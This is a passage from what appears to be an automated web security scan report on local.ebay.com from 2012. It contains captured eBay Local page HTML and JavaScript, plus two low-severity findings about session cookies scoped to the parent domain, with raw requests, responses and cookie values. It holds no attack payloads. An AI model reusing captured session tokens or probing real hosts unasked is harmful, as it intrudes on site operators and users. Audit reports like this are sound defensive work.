<a href="http://www.ebay.com/ctg/mp.html?_flppid=9301156&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Panasonic - Lumix FH25 16.1-Megapixel Digital Camera - Silver'>Panasonic - Lumix FH25 16.1-Megapixel Digital Camera - Silver</a>
</div><div class="price"><span class="price">$129.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="17698207" coords="32.9274,-96.814,1792,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1792.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/013/559/882/200/13559625_17148882_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=17698207&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Sesame Street Let's Rock Elmo'>Sesame Street Let's Rock Elmo</a>
</div><div class="price"><span class="price">$49.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="17380640" coords="33.008115,-96.70534,3040,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/3040.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/012/214/103/200/12214732_16180103_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=17380640&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Call of Duty: Modern Warfare 3 for Nintendo DS'>Call of Duty: Modern Warfare 3 for Nintendo DS</a>
</div><div class="price"><span class="price">$29.96<span class="sep">-</span>$29.99</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12171471" coords="32.91079,-96.95881,9386,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/9386.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/824/726/200/10824080_16054726_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12171471&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Call of Duty Modern Warfare 3 for Nintendo Wii'>Call of Duty Modern Warfare 3 for Nintendo Wii</a>
</div><div class="price"><span class="price">N/A</span>
</div>
</div>
<div class="clr"></div></div><div class="dealWrap" id="12143174" coords="32.679624,-97.114002,13361,http://static.milo.com/20111201145320/images/store_icons/flat_by_id/13361.png">
<img class="dealImg" src="http://imagethumbnails.milo.com/010/794/929/200/10794580_14287929_200.jpg" />
<div class="rCnt"><div class="ttl">
<a href="http://www.ebay.com/ctg/mp.html?_flppid=12143174&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1" target="_blank" title='Kids II.. Baby Einstein... Take Along Tunes'>Kids II.. Baby Einstein... Take Along Tunes</a>
</div><div class="price"><span class="price">$9.99</span>
</div>
</div>
<div class="clr"></div></div>
                                                       </div>
                                                   </div>
                                               </div>
                       
                                               <a id="fsRa1" href="javascript:;" class="loc-fsA loc-fsRa"></a>
                                           </div>
                                       </td>
                                   
                                   
                               </tr>
                           </table>
                       </div>
                   </div>
</div><div class="footer"><div class="coreFooterLinks" id="glbfooter"><div><div id="rtm_html_1650"></div><div id="rtm_html_1651"></div></div><table border="0" cellpadding="0" cellspacing="0" width="100%"><tr class="g-hlp" valign="top"><td class="g-nav coreFooterLegalNotice">Copyright .. 1995-2012 eBay Inc. All Rights Reserved. Designated trademarks and brands are the property of their respective owners. Use of this Web site constitutes acceptance of the eBay <a href="http://pages.ebay.com/help/policies/user-agreement.html?rt=nc" _sp="m571.l2612">User Agreement</a> and <a href="http://pages.ebay.com/help/policies/privacy-policy.html?rt=nc" _sp="m571.l2613">Privacy Policy</a>.<br><img src="http://q.ebaystatic.com/aw/pics/s.gif" height="20" alt=""></td></tr></table><div id="cobrandFooter"></div></div><script type="text/javascript">var _GlobalNavHeaderStatic=false, _GlobalNavHeaderCookieTracking=true, _GlobalNavHeaderSrcPageId=3872; var un="undefined";if(typeof(vjo)!=un && typeof(vjo.darwin)!=un && typeof(vjo.darwin.globalnav)!=un) vjo.darwin.globalnav.util.SGuid.writeSessionGuid("ab1ed36f1340a03663a54955ff73ced6");vjo.darwin.core.ebayheader.rover.FooterRover.roverService("http://rover.ebay.com/idmap/0?footer");; if(vjo && vjo.darwin && vjo.darwin.globalnav && vjo.darwin.globalnav.rtm && vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall)vjo.darwin.globalnav.rtm.GlobalHeaderRtmCall.submitRTMCall("http://ir.ebaystatic.com/v4js/z/ur/grupfpzzoq4wjpypydpyjswhd.js");</script><script src="http://include.ebaystatic.com/js/e687/us/ebayfooter_cobrand_v4_e6871us.js"></script><!--@sgfp@ footerStyle=MIN:CGI @egfp@--></div></div><script type="text/javascript" src="http://maps.googleapis.com/maps/api/js?v=3.4&amp;client=gme-ebayinc1&amp;sensor=true"></script><script src="/local/localjs.js"></script><script type="text/javascript">var distances = new Array(0.5, 1, 2, 5, 10, 15, 20, 25, 50, 100);
var _sadis = document.getElementById("_flprad");
// locSliderGetElementByID: Cross-browser version of "document.getElementById()"
function locSliderGetElementById(element) {
   if (document.getElementById) element = document.getElementById(element);
   else if (document.all) element = document.all[element];
   else element = null;
   return element;
}

// locSliderLeft: Cross-browser version of "element.style.left"
function locSliderLeft(elmnt, pos) {
   if (!(elmnt = locSliderGetElementById(elmnt))) return 0;
   if (elmnt.style && (typeof(elmnt.style.left) == 'string')) {
       if (typeof(pos) == 'number') elmnt.style.left = pos + 'px';
       else {
           pos = parseInt(elmnt.style.left);
           if (isNaN(pos)) pos = 0;
       }
   }
   else if (elmnt.style && elmnt.style.pixelLeft) {
       if (typeof(pos) == 'number') elmnt.style.pixelLeft = pos;
       else pos = elmnt.style.pixelLeft;
   }
   return pos;
}

function setPos (distance) {
   var index = 0;
   /*for(var i=0,l=distances.length;i<l; i++){
       if(distance == distances[i]) {
           index = i;
           break;
       }
   }
   var pos = locSliderLeft("slider", (index*12.8)+6);
   document.getElementById("display").innerHTML = distance + " miles"; // put the new value in the slider display element
   document.getElementById("progress").style.width = (pos+30)+"px";*/
   _sadis.value = distance;
}
// slide: Handles the start of a slider move.
function slide(evnt, slider, left, right, display, progress, progressOffset) {
   if (!evnt) {
evnt = window.event;
   }
   sliderObj = locSliderGetElementById(slider);
   displayObj = locSliderGetElementById(display);
   progressObj = locSliderGetElementById(progress);
   progressObjOffset = progressOffset
   xLeft = left;
   xRight = right;
   pxLeft = locSliderLeft(sliderObj.id);
   xStart = evnt.screenX; // Horizontal mouse position at start of slide.
   mouseover = true;
   document.onmousemove = moveSlider; // Start the action if the mouse is dragged.
   document.onmouseup = sliderMouseUp; // Stop sliding.
}

// moveSlider: Handles slider and display while dragging
function moveSlider(evnt) {
   var evnt = (!evnt) ? window.event : evnt; // The mousemove event
   if (mouseover) { // Only if slider is dragged
       x = pxLeft + evnt.screenX - xStart; // Horizontal mouse position relative to allowed slider positions
       // Limit horizontal movement
       if (x > xRight) {
       x = xRight;
       }
       if (x < xLeft) {
        x = xLeft;
       }
       locSliderLeft(sliderObj.id, x); // move slider to new horizontal position
       distance = distances[Math.min(Math.round((x - xLeft) * distances.length / (xRight - xLeft)), distances.length - 1)]; // distance selection
       displayObj.innerHTML = distance + " miles"; // put the new value in the slider display element
       _sadis.value = distance;

       progressObj.style.width = (x + progressObjOffset - xLeft) + "px";
       
       return false
   }
   return
}
// sliderMouseup: Handles the mouseup event after moving a slider.
// Snaps the slider position to allowed/displayed value.
function sliderMouseUp() {
   mouseover = false // Stop the sliding.
   if (document.removeEventListener) { // Remove event listeners from 'document' (Mozilla).
       document.removeEventListener('mousemove', moveSlider, false)
       document.removeEventListener('mouseup', sliderMouseUp, false)
   }
   else if (document.detachEvent) { // Remove event listeners from 'document' (IE).
       document.detachEvent('onmousemove', moveSlider)
       document.detachEvent('onmouseup', sliderMouseUp)
   }
   //document.distanceForm.submit();
   submitDistance();
}

function submitDistance(){
   var t=this, zip = document.getElementById("_fpos"),zipName,disName;
   if(!zip || (zip && !(zipName=zip.getAttribute("name"))) || !_sadis ||(_sadis && !(disName=_sadis.getAttribute("name")))) return;
   var url = document.location.href;
   if(zipName == '_fpos') {
       var value = zip.value;
       url = vjo.dsf.utils.URL.addArg(url, '_fpos', value);
   }
   if(disName == '_flprad') {
       var value1 = _sadis.value;
       url = vjo.dsf.utils.URL.addArg(url, '_flprad', value1);
   }else {
       return;
   }        
   window.location = url;
   }

</script><script type="text/javascript">(function () {
var _r = vjo.Registry;
_r.put('0',new vjo.dsf.utils.SiteSpeed()); })();
(function(){
var _d=vjo.dsf.EventDispatcher;
var _r=vjo.Registry;
_d.add('body','load',function(event) { this.setData({"placeholder":"Enter valid U.S ZIP Code","jsId":"merFs","trkId":"p5791.m1","data":{"numResults":0,"localPickupModel":null,"errorMap":null,"noProductFound":false,"location":"75217","deals":[{"highPrice":null,"highPriceValue":null,"productId":6706621,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":1,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":9,"id":9,"name":"5","integer":9},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=6706621&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/007/760/502/200/7760076_8070502_200.jpg","lowPrice":{"valueInMinorUnits":1498,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":14980000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":1,"title":"Elefun & Memory Game Pack","offerIds":"7760076","numLocalStore":1,"lowPriceValue":"$14.98","miloProductOfferModel":[{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":1498,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":14980000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 67.5px\"><\/span>\n<\/span><span class=\"revCnt\">(1)<\/span>"},{"highPrice":null,"highPriceValue":null,"productId":919914,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":24,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":9,"id":9,"name":"5","integer":9},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=919914&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/009/992/340/200/9992110_12438340_200.jpg","lowPrice":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":24,"title":"Call of Duty 4: Modern Warfare: Game of the Year Edition for Sony PS3","offerIds":"9992110","numLocalStore":1,"lowPriceValue":"$19.99","miloProductOfferModel":[{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 67.5px\"><\/span>\n<\/span><span class=\"revCnt\">(24)<\/span>"}],"title":"","trkId":null,"localLandingLeftNavModel":null,"numOfResults":0,"topProducts":[{"highPrice":null,"highPriceValue":null,"productId":920956,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":185,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":5,"id":5,"name":"3","integer":5},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=920956&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/000/899/987/200/899394_13232987_200.jpg","lowPrice":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":185,"title":"Elefun - The Butterfly Catchin' Game","offerIds":"899394","numLocalStore":1,"lowPriceValue":"$19.99","miloProductOfferModel":[{"merchantTitle":"Toys\"R\"Us","merchantId":5893,"linkUrl":null,"location":{"merchantName":"Toys\"R\"Us","latitude":32.874857,"merchantLogoUrl":"http://milo.com/images/stores/5893.jpg","longitude":-96.76977},"RTPalUrl":null,"price":{"valueInMinorUnits":1999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":19990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/5893.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 40.5px\"><\/span>\n<\/span><span class=\"revCnt\">(185)<\/span>"},{"highPrice":null,"highPriceValue":null,"productId":9301156,"ratingModel":{"reviewOnclick":null,"microDataEnabled":false,"redirectUrl":null,"darkBackground":false,"firstReviewUrl":null,"reviewCount":4,"reviewUrl":null,"redesignedWAR":false,"redesignedReviews":false,"userSignedIn":false,"rating":{"value":6,"id":6,"name":"3-5","integer":6},"WARLayerOnLoad":false},"noPriceIn":false,"url":"http://www.ebay.com/ctg/mp.html?_flppid=9301156&_flprad=25.0&_fpos=75217&_fspt=1&_laitc=1&_trksid=p5791.m1","zeroReviews":false,"imageUrl":"http://imagethumbnails.milo.com/010/453/045/200/10453722_13347045_200.jpg","lowPrice":{"valueInMinorUnits":12999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":129990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"reviewCount":4,"title":"Panasonic - Lumix FH25 16.1-Megapixel Digital Camera - Silver","offerIds":"10453722","numLocalStore":1,"lowPriceValue":"$129.99","miloProductOfferModel":[{"merchantTitle":"Best Buy","merchantId":1779,"linkUrl":null,"location":{"merchantName":"Best Buy","latitude":32.931615,"merchantLogoUrl":"http://milo.com/images/stores/1779.jpg","longitude":-96.821136},"RTPalUrl":null,"price":{"valueInMinorUnits":12999,"currency":{"iso4217DigitCode":840,"value":840,"decimals":2,"iso4217DigitCodeString":"840","symbol":"$","symbolPrefix":true,"id":840,"name":"USD","currencyId":1,"maxAmount":99999999,"code":"USD","integer":840},"internalValue":129990000,"negative":false,"zero":false,"currencySymbol":"$","positive":true,"wholeNumberInMajorUnits":false},"merchantLogoUrl":"http://static.milo.com/20111201145320/images/store_icons/flat_by_id/1779.png"}],"ratingNode":"<span class=\"rw\" style=\"height: 12px; background-position: 0pt -10px;\">\n <span class=\"rstar\" style=\"height: 12px; background-position: 0pt 1px; width: 47.25px\"><\/span>\n<\/span><span class=\"revCnt\">(4)<\/span>"}],"ticketModel":null},"zipcode":"75217"}); },vjo.ebay.local.localmap.LocalMap);_d.add('body','load',function(event) { this.init({"leftFsPages":6,"jsId":"localinfoFs","content":true,"rightFs":false,"rightFsPages":0}); },vjo.ebay.local.localinfo.LocalInfo);_d.add('body','load',function(event) { this.init("75217", "1"); },vjo.ebay.local.LocalLandingPage);})();
</script></body></html><!--RcmdId LocalDomain-dcp,RlogId jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac8a4617-->

2.6. http://local.ebay.com/Netsparkerda2c171579864172a93a0dee2635cf81/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /Netsparkerda2c171579864172a93a0dee2635cf81/

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

HEAD /Netsparkerda2c171579864172a93a0dee2635cf81/ HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Cookie: ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpOAYWM4OWNlZjMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MmPYfEVP; nonsession=CgADKACBYa0OAYWM4OWNlZjMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MmMAywABTwVJCDFkyjHB
Accept-Encoding: gzip, deflate
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3A37dg%60b-134ac89d594
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: s=CgAD4ACBPBpOCYWM4OWNlZjMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MmO1mWSp; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OCYWM4OWNlZjMxMzQwYTAyYTIzNjdlODc3ZmZmZmU1MmMAywABTwVJCjJW9w1k; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:02 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 0
Date: Thu, 05 Jan 2012 06:24:01 GMT


2.7. http://local.ebay.com/Netsparkerfef19f760fcf485390b22c198f57cfa9  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://local.ebay.com
Path:   /Netsparkerfef19f760fcf485390b22c198f57cfa9

Issue detail

The following cookies were issued by the application and is scoped to a parent of the issuing domain:The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /Netsparkerfef19f760fcf485390b22c198f57cfa9 HTTP/1.1
Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1; .NET CLR 1.1.4322; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30)
Cache-Control: no-cache
Host: local.ebay.com
Cookie: ebay=%5Ecv%3D15555%5E; s=CgAD4ACBPBpOFYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjVlIWWv; nonsession=CgADKACBYa0OFYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjUAywABTwVJDTPQpc/J
Accept-Encoding: gzip, deflate
Content-Length: 10






Response

HTTP/1.1 200 OK
Server: Apache-Coyote/1.1
RlogId: jh%60djkbkbnmbvfd%60%3C%3Ds%7D%2Bpu56*%3Bc6cb0g-134ac8a4caf
Cache-Control: no-cache
Pragma: no-cache
Set-Cookie: s=CgAD4ACBPBpOgYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjXg/re1; Domain=.ebay.com; Path=/
Set-Cookie: nonsession=CgADKACBYa0OgYWM4OWNlNmYxMzQwYTAyYTA5NTFmZTYxZmZmZmU0NjUAywABTwVJKDTIEsXE; Domain=.ebay.com; Expires=Fri, 04-Jan-2013 06:24:32 GMT; Path=/
Content-Type: text/html;charset=UTF-8
Content-Length: 34948
Date: Thu, 05 Jan 2012 06:24:32 GMT

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"><html><head><title>eBay - Local</title><link href="http://www.ebay.com/favicon.ico" rel="icon" type="image/ico"><link href="/local/localcss.css" rel="stylesheet" type="text/css"></head><body id="body"><!--[if lt IE 8 ]> <style type="text/css"> .srpbt{position:relative;width:1%;} .srpi {width:435px;} .zipcode{zoom:1;height:100%;z-index:111} </style><![endif]--><div id="ff-body" class="bdy"><script type="text/javascript">var _GlobalNavHeaderUtf8Encoding=true;</script><script type="text/javascript">var includeHost="http://include.ebaystatic.com/";</script><link rel="stylesheet" type="text/css" href="http://ir.ebaystatic.com/v4css/z/2s/3zhykpa5ca0zthsnrhjg02hpi.css"><script src="http://ir.ebaystatic.com/v4js/z/yo/qicc5beyw2zejm0u4bus2lv3u.js"></script><script type="text/javascript" src="http://ir.ebaystatic.com/v4js/z/qz/kjtciulcyi4gtcfxjs5s2k33m.js"></script><!--[if lt IE 7 ]><div id='gnheader' class='gh-w ie6'><![endif]--><!--[if IE 7]><div id='gnheader' class='gh-w ie7'><![endif]--><!--[if (gt IE 7)|!(IE)]><!--><div id="gnheader" class="gh-w"><!--<![endif]--><a href="#mainContent" rel="nofollow" class="g-hdn">Skip to main content</a><div><div class="gh-eb"><div class="gh-emn"><div class="gh-hid"></div><div class="gh-mn"><span class="gh-fst"><a id="MyEbay" href="http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1" _sp="m570.l2919">My eBay</a></span><a id="Sell" href="http://cgi5.ebay.com/ws/eBayISAPI.dll?aidZ153=&amp;MfcISAPICommand=SellHub3" _sp="m570.l1528">Sell</a><a id="Community" href="http://community.ebay.com" _sp="m570.l1540">Community</a><span class="gh-nho"></span><a id="Help" href="http://ocs.ebay.com/ws/eBayISAPI.dll?CustomerSupport" _sp="m570.l1545">Customer Support</a><span class="gh-nho"><span class="gh-sc" style="display:none" id="GH_Cart"><a href="http://payments.ebay.com/ws/eBayISAPI.dll?ShopCart&amp;ssPageName=CART:HDR"><img src="http://p.ebaystatic.com/aw/pics/buy/cart/iconCart000.gif" alt="Your shopping cart" border="0" height="24" width="31"></img>Cart</a></span><script type="text/javascript">vjo.darwin.globalnav.shoppingcart.ShoppingCart.RefreshCart()</script></span></div></div><form id="headerSearch" name="headerSearch" method="get" action="http://www.ebay.com/sch/i.html"><input type="hidden" name="_from" value="R40"><input type="hidden" name="_trksid" value="m570.l2736"><span class="gh-esb"><label for="_nkw" class="g-hdn">Enter your search keyword</label><input type="text" class="gh-txt" name="_nkw" id="_nkw"><a><input type="submit" value="Go" class="gh-go"></a></span></form></div><div class="gh-log"><span class="gh-lg"><a id="EbayLogo" href="http://www.ebay.com" _sp="m570.l2586"><img src="http://p.ebaystatic.com/aw/pics/logos/logoEbay_x45.gif" alt="eBay" border="0" height="45" width="110"></img></a></span><span class="gh-wrap"><span class="gh-shim"></span><span class="greeting gh-ui"><script type="text/javascript">vjo.darwin.core.greetings.VjGreetingsClient.writePersonalHeader("Sign in", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "register", "https://scgi.ebay.com/ws/eBayISAPI.dll?RegisterEnterInfo", "Sign out", "https://signin.ebay.com/ws/eBayISAPI.dll?SignIn", "Welcome! ##1## or ##2##.", "Hi, <b>##1##<\/b>! (##2##)", "Hi, <b>##1##<\/b>! (<a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l2620\">Not you<\/a>?)", "Hello! <a href=\"https://signin.ebay.com/ws/eBayISAPI.dll?SignIn\" _sp=\"m570.l1524\">Sign in/out<\/a>.", "<img src=\"http://p.ebaystatic.com/aw/pics/icon/iconWarnRed_16x16.gif\" height=\"16\" width=\"16\" alt=\"Alert\">", "<span id=\"bta\">##1##<\/span>", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alert<\/a>.", " | You have <a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyEbay&amp;gbh=1&amp;ssPageName=STRK:ME:LNLK&amp;CurrentPage=MyeBayMyMessages\" _sp=\"m570.l2623\">##1## alerts<\/a>.", "1", "", true)</script></span><span class="coupon rebate" id="rbt" style="display:none"><img src="http://p.ebaystatic.com/aw/pics/promo/magic/pmoGleam10_150x23.gif" alt="Coupon" border="0" height="23" width="150"></img><!--googleoff: all--> Must use Buy It Now and PayPal.<br/><a href="http://pages.ebay.com/cashbackoffer/terms.html" _sp="m570.l2735">See conditions</a><!--googleon: all--><script type="text/javascript">vjo.darwin.core.ebayheader.rebate.RebateBox.Refresh("rbt", "10", "<img src=\"http://q.ebaystatic.com/aw/pics/icons/iconRedeemCoupon20x20.gif\" alt=\"Coupon\" border=\"0\" height=\"20\" width=\"20\"><\/img><a href=\"http://my.ebay.com/ws/eBayISAPI.dll?MyeBay&amp;CurrentPage=MyeBayIncentives&amp;gbh=1\" _sp=\"m570.l2735\">You have coupons available<\/a>")</script></span></span></div><div></div></div><div class="gh-cl"></div><div><div class="gh-col"><b class="gh-c1"></b><b class="gh-c2"></b><b class="gh-c3"></b><b class="gh-c4"></b><b class="gh-c5"></b><b class="gh-c6"></b><b class="gh-c7"></b><div class="gh-clr"></div></div><div id="headerWrapper" class="gh-hbw"><div class="gh-hb"><div class="gh-mn"><a id="BrowseCategories" href="http://shop.ebay.com/allcategories/all-categories" _sp="m570.l1620">CATEGORIES</a><a id="chevron0" href="javascript:;" class="gh-ai"><b>&nbsp;</b></a><a id="EbayElectronics" title="Your shopping destination for the best selection and value in electronics and accessories" href="http://www.ebay.com/electronics/" _sp="m570.l2959">ELECTRONICS</a><span id="11450_sp"><a title="Your new destination for Clothing, Shoes &amp; Accessories on eBay." href="http://www.ebay.com/fashion/" _sp="m570.l2624">FASHION</a></span><a id="6000_sp" title="Buy and sell cars, trucks, vehicle parts, and accessories." href="http://www.motors.ebay.com/" _sp="m570.l2597">MOTORS</a><a id="EbayTickets" title="Tickets ... Sports, Concerts, Theater and More on eBay" href="http://www.ebay.com/tickets" _sp="m570.l1624">TICKETS</a><a id="172382_sp" title="Great items, deep discounts, and free shipping!" href="http://deals.ebay.com/" _sp="m570.l2625">DEALS</a><a id="EbayClassifieds" href="http://www.ebayclassifieds.com" _sp="m570.l2626">CLASSIFIEDS</a></div></div><div class="gh-lbh1"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_876"></div></div></div><div class="gh-lbh2"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_912"></div></div></div><div class="gh-lbh3"><div class="gh-rtm" style="display:inline-block;display:block;"><div id="rtm_html_433"></div></div></div><div class="gh-clr"></div></div><img src="http://rover.ebay.com/roversync/?site=0&amp;stg=1&amp;mpt=1325720851249" alt="" width="1" height="1"><script type="text/javascript">var svrGMT = 1325720851249;var scbps=0;var scPageName='GlobalHeader:3872';</script><div class="gh-ovr" id="gbh_ovl"><div class="gh-iovr"></div></div></div><a name="mainContent"></a></div><script src="http://include.ebaystatic.com/js/e723/us/ebaybase_v4_e7231us.js"></script><script src="http://include.ebaystatic.com/js/e681/us/ebaysup_e6811us.js"></script><script type="text/javascript">if(document.documentMode != 8 && document.compatMode != "CSS1Compat") ebay.oDocument._getControl("headerCommon")._exec("writeStyleSheet");</script><script type="text/javascript">vjo.Registry.put('bta', new vjo.darwin.globalnav.bta.BuyerTransactionAlert("bta", 60, 2, 2, "http://bmsgs.ebay.com/ws/eBayISAPI.dll?GetBuyerTransactionAlerts", "http://q.ebaystatic.com/aw/pics/", "http://cgi.ebay.com/ws/eBayISAPI.dll?ViewItem", "Watched Item ending soon!", "You've been outbid!", "You've received a Second Chance Offer", "You've received a Transaction Confirmation Request."));
vjo.darwin.globalnav.util.EventReg.aggregate(vjo.Registry._bta.onRefreshHdl());
